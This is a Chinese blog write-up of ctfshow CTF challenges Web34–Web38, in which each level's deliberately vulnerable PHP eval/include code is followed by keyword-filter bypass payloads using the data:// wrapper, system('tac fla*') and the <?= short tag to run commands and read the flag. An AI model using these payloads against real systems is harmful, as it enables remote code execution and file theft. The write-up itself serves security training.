ctfshow(34->38)--RCE/命令执行漏洞

最新推荐文章于 2024-12-06 00:10:11 发布
最新推荐文章于 2024-12-06 00:10:11 发布
阅读量395 收藏 4
点赞数 14
分类专栏: RCE 文章标签: web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56019217/article/details/143083815
版权

Web34

源代码:

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

代码审计:

过滤了preg_match函数//之间的关键字。

思路:

比起上一题多过滤了冒号.
不影响使用文件包含,与上一题操作相同。

EXP:

ls获取目录下的文件:

https://7e8eaa5a-1f6a-4111-8d41-020011cec413.challenge.ctf.show/
?c=include$_GET[1]?>
&1=data://text/plain,<?php system('ls');?>

读取flag文件:

https://7e8eaa5a-1f6a-4111-8d41-020011cec413.challenge.ctf.show/
?c=include$_GET[1]?>
&1=data://text/plain,<?php system('tac fla*');?>

得到flag.

Web35

源代码:

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);

代码审计:

过滤了preg_match函数//之间的关键字。

思路:

比起上一题多过滤了小于号<和等于号=
不影响使用文件包含,与上一题操作相同。

EXP:

ls获取目录下的文件:

https://34966380-02a4-45b6-9248-0fe39acb14df.challenge.ctf.show/
?c=include$_GET[1]?>
&1=data://text/plain,<?php system('ls');?>

读取flag文件:

https://34966380-02a4-45b6-9248-0fe39acb14df.challenge.ctf.show/
?c=include$_GET[1]?>
&1=data://text/plain,<?php system('tac fla*');?>

得到flag.

Web36

源代码:

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

代码审计:

过滤了preg_match函数//之间的关键字。
其中 [0-9] 表示匹配0到9之间的所有数字,[]只匹配单个字符

思路:

多过滤了斜杠/和数字0-9
所以我们将构造的c=include$_GET[1]?>中的 GET参数1 替换为 任意字母 绕过对数字的过滤。

EXP:

ls获取目录下的文件:

https://34c0f893-1a28-4fed-990a-2c47c55740d8.challenge.ctf.show/
?c=include$_GET[a]?>
&a=data://text/plain,<?php system('ls');?>

读取flag文件:

https://34c0f893-1a28-4fed-990a-2c47c55740d8.challenge.ctf.show/
?c=include$_GET[a]?>
&a=data://text/plain,<?php system('tac fla*');?>

得到flag.

Web37

源代码:

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    }
        
}else{
    highlight_file(__FILE__);
}

代码审计:

perg_match函数过滤了flag
include函数对GET参数c进行了包含

思路:

使用data://伪协议读取文件内容。
由于过滤了flag,所有我们使用通配符*绕过。

EXP:

https://b0b97e25-534a-4eaf-a52d-fcecb6f24740.challenge.ctf.show/
?c=data://text/plain,<?php system('tac fla*')?>

得到flag.

Web38

源代码:

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    }
        
}else{
    highlight_file(__FILE__);
}

代码审计:

preg_match函数过滤了flag,php,file
对 c 进行了包含。

思路:

我们要构造?c=data://text/plain,<?php system('tac fla*');?>读取flag.php文件。
但是这里过滤了关键字php,所以我们用短标签<?=绕过。

在PHP中,<?= 等同于 <?php echo.

EXP:

构造payload:

https://168087e6-1c0e-433c-b42e-e0e2c4b0035c.challenge.ctf.show/
?c=data://text/plain,<?= system('tac fla*');?>

得到flag.

Wh1teR0se
关注
专栏目录
命令执行漏洞—CTFSHOW(简单利用)
weixin_44431280的博客
03-05 1449
命令执行漏洞—CTFSHOW(简单利用) 远程命令执行简介和原理可以参考文章Web安全—远程命令/代码执行RCE) 远程命令执行1: 1,题目简介分析 代码分析:$_GET()函数读取URL传过来的C参数和值,然后使用preg_match函数判断传过来的参数值是否包含flag值(用来对传入的参数值进行过滤),然后使用eval()函数执行C参数传过来的值。 2,思路分析 通过信息收集判断网站操作系统类型,然后通过参数传入值执行操作系统命令,因为未对参数值进行限制,所以此处存在命令执行和代码执行漏洞 通过
ctfshow web入门 命令执行web29-web57详解
2401_84009549的博客
04-20 907
当print_r(scandir(pos(localeconv())));时,会返回当前目录,pos(localeconv())的值为"."将数组用array_reverse进行倒转,并用next将指针指向flag.php最后进行读取,列出两个整理起来就是。
ctfshow(29-33)--RCE/命令执行漏洞
m0_56019217的博客
10-19 652
源代码: 代码审计: error_reporting(0) 关闭所有php报错。 preg_match(“/flag/i”, $c) 在 参数c 中正则匹配 flag,i意味着不区分大小写。 eval() 执行函数中的代码。利用 system() 函数执行系统命令,获取flag文件位置并读取。 由于flag被过滤,我们可以使用通配符*来绕过过滤。使用ls命令读取当前目录下的文件: 这里注意的结尾是分号。因为eval()执行php代码,而分号;是php代码结束的标志,不能缺少。 得到flag所在位置flag.
ctfshow(39-40)--RCE/命令执行漏洞
m0_56019217的博客
10-19 528
反转数组,此时flag.php文件位于第二个指针位置,所以使用next()将指针移动到第二个位置,最后使用show_source()显示文件内容。>是php代码的结束标志,后面的.php会被忽略掉,所以构造。,即不能传参的情况下,依靠没有参数传入的函数的嵌套实现RCE。观察后发现过滤的括号是中文括号,英文状态下的括号还是可以用。,使用或运算构造我们需要的payload.:返回一个包含本地数字及货币格式信息的。:用于输出变量的相关信息,包含变量的。:返回数组中的当前元素的值。:返回一个当前目录的数组。
ctfshow(66-70)--RCE/命令执行漏洞--禁用命令执行函数
m0_56019217的博客
10-27 451
由于题目过滤了命令执行函数,所以使用其他方法进行RCE。说明highlight_file()函数被禁用了。替换为var_export或implode即可。查看当前目录下的文件,发现了flag.php。POST传参c,eval进行代码执行。查看根目录,发现flag.txt。base64解码得到flag.用php伪协议查看文件内容。发现两个打印函数都被过滤了。查看发现没有flag.
ctfshow(42-50)--RCE/命令执行漏洞--shell重定向与基础绕过
m0_56019217的博客
10-22 603
可见这里虽然过滤了数字,但是url解码的优先级应该高于正则匹配的优先级,所以我们还是能使用%09.多过滤了\x09与\x26,\x后面的是16进制数字,分别过滤ASCII码中16进制位次位09和26的符号。是一个shell重定向操作,意味着命令的标准输出和标准错误都被重定向到 /dev/null,即被丢弃。使用分隔符将语句分隔,让重定向语句不会影响我们输入语句的正常执行。Tab绕过空格过滤,url编码为%09。即,\x09过滤TAB,\x26过滤&。多过滤了一些命令,不影响我们绕过。
ctfshow(51-54)--RCE/命令执行漏洞--基础绕过
m0_56019217的博客
10-23 634
贪婪匹配意味着匹配任意字符、匹配0或无限次,在该代码中导致的结果就是:我们在要绕过的关键词的。使用mv命令重命名flag.php文件,然后利用cat的替换命令uniq访问。的常规绕过方法失效,所以我们考虑使用没有被过滤的命令来达到同样的RCE效果。就是显示flag.php文件中包含字符串flag的行。可以识别相邻的重复行,并根据需要保留或删除这些重复行。参数c为我们要执行的系统命令,原本的值应该为。少了shell重定向,不需要再使用管道符。在上一题的基础上去掉管道符即可。都会被匹配,从而导致无法绕过。
ctfshow(41)--RCE/命令执行漏洞--或绕过
m0_56019217的博客
10-24 554
的值与target中相应的字符串相同,就将两个url编码变量储存在res1和res2中,再跳出到最外层循环,继续运算下一个字符。这是因为16以下的十进制数字的十六进制形式都是一位数,而ASCII码中的符号的十六进制编码都是两位,不足两位的要在前面补零。中字符的索引,从第一个字符,即索引为0的字符开始,依次运算到最后一个字符,即。从0开始,到255为止,对应的是ASCII码中的256个编码的序号。是一个正则形式的字符串,储存的是题目过滤的字符。,即loop的值为false时,跳出该层循环。
ctfshow(57,58)--RCE/命令执行漏洞--取反绕过与禁用命令执行函数
m0_56019217的博客
10-26 778
scandir作用是读取指定目录下的所有文件和子目录,并返回包含这些文件和子目录的数组。得到flag.php文件base64编码后的内容,解码即可获得flag.不能使用命令函数,我们考虑使用包含函数include与php伪协议。双小括号(())是bash shell中用于进行整数运算的命令。由于36的反码是-37,所以我们对-37取反,就能得到36。说明管理员在php配置文件中禁用了该命令执行函数。的值是0,因为双括号中没有值。使用其他命令函数也显示被禁用。,也就是-37,就能算出36。
rce漏洞-ctfshow(50-70)
m0_74402888的博客
07-23 1172
文件名:
ctfshow(159-162)--文件上传漏洞
m0_56019217的博客
10-30 742
前端校验+MIME验证+黑名单。
ctfshow-web41~60-WP
02-21
目标是通过构建特定的payload来实现命令执行,并最终获取到flag。 #### 代码分析 首先,我们来看一下题目提供的PHP代码片段: ```php if(isset($_POST['c'])){ $c = $_POST['c']; if(!preg_match('/[0-9]|[a-z]...
ctfshow-ssrf
孤桜懶契
08-21 352
前言 记录web的题目wp,慢慢变强,铸剑。 SSRF SSRF(Server-Side Request Forgery: 服务器端请求第二天) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF 攻击的目标是从网无法访问的内部系统。(因为它是由服务端发起的,所以它能够请求到与它相关而与外部网隔离的内部系统) web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=cu
安全漏洞】ThinkPHP 3.2.3 漏洞复现
HBohan的博客
09-04 1697
$this->show 造成命令执行 在 Home\Controller\IndexController 下的index中传入了一个可控参数,跟进调试看一下。 class IndexController extends Controller { public function index($n='') { $this->show('<style type="text/css">*{ padding: 0; margin: 0; } div{ paddi
网络安全Web安全、渗透测试之笔经面经总结(一)
2401_88857275的博客
12-04 821
为了防止不同域在用户浏览器中彼此干扰,浏览器对从不同来源(域)收到的内容进行隔离。浏览器不允许任何旧有脚本访问一个站点的cookie,否则 ,会话容易被劫持。只有发布cookie的站点能够访问这些cookie,只有通过该站点返回的页面所包含或加载的JavaScript才能访问cookie。
网络安全信息收集(总结)更新
m0_74741186的博客
12-05 143
dns域传送送、公开dns数据集、通过搜索引擎、通过网路空间搜索引擎、子域名的信息泄露包括js文件泄露和网络爬虫、在线子域名收集、子域名爆破工具。icp备案查询、dns记录查询、​​​​​​​Whois查询包括在线网站和邮箱反查、​​​​​​​IP反查可利用网络空间搜索引擎或者威胁情报中心。为什么要收集主域名,根据资产信息,如果给我们公司,我们就需要公司去找备案,再去找他的主域名,然后找他的子域名。信息收集分为哪几类,什么是主域名,为什么要收集主域名,为什么要收集子域名,什么时候收集web信息,
浅谈网络安全态势感知
2401_88751384的博客
12-05 435
安全态势感知是一种新兴的安全概念,而不是单一的一种安全技术。是一种基于环境的、动态、整体地洞悉安全风险的能力。从前面的介绍,可以知道安全态势感知的前提是安全大数据。在安全大数据的基础上,进行数据整合、特征提取,然后应用一系列态势评估算法生成网络的整体态势状况,应用态势预测算法预测态势的发展状况。最后在交互层,使用数据可视化技术,将态势状况和预测情况展示给安全人员,方便安全人员直观便捷的了解网络当前状态及预期的风险。
钓鱼攻击详解:鱼叉攻击与水坑攻击
最新发布
vortex5的博客
12-06 552
因此,企业不仅需要技术防御手段,更需要培养员工的安全意识,做到人防与技防相结合,从而构建牢不可破的安全屏障。攻击者通过精心伪造的电子邮件或消息,诱导受害者点击链接或打开附件,从而实现攻击目的。当受害者访问这些网站时,恶意代码便会自动执行,完成攻击。受害者一旦打开伪造邮件中的附件或点击恶意链接,其设备可能被植入木马病毒,攻击者可以通过远程控制窃取敏感信息、操控设备或扩展攻击范围。通过水坑攻击,攻击者不仅能窃取访问者的敏感信息,还可以利用受害者的信任关系扩散恶意软件,甚至影响目标组织的供应链安全
杂七杂八的网络安全知识
noob1561的博客
12-02 1027
操作系统是计算机系统软硬件资源的控制中心并发共享:互斥访问、同时访问虚拟异步cpu存储设备文件网络与通信机型分类:大型机、中型机、小型机、微型机用户数目分类:单用户操作系统、多用户操作系统功能特征分类:批处理操作系统、实时操作系统、分时操作系统应用领域分类:桌面操作系统、服务器操作系统、嵌入式操作系统。
CVE-2020-16875:Exchange Server RCE漏洞复现分析
"CVE-2020-16875是Microsoft Exchange Server的一个远程代码执行(RCE)漏洞,主要由于对cmdlet参数验证的不足导致。攻击者能够利用此漏洞在系统用户的上下文中执行任意代码,但需要拥有以特定Exchange角色进行身份...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值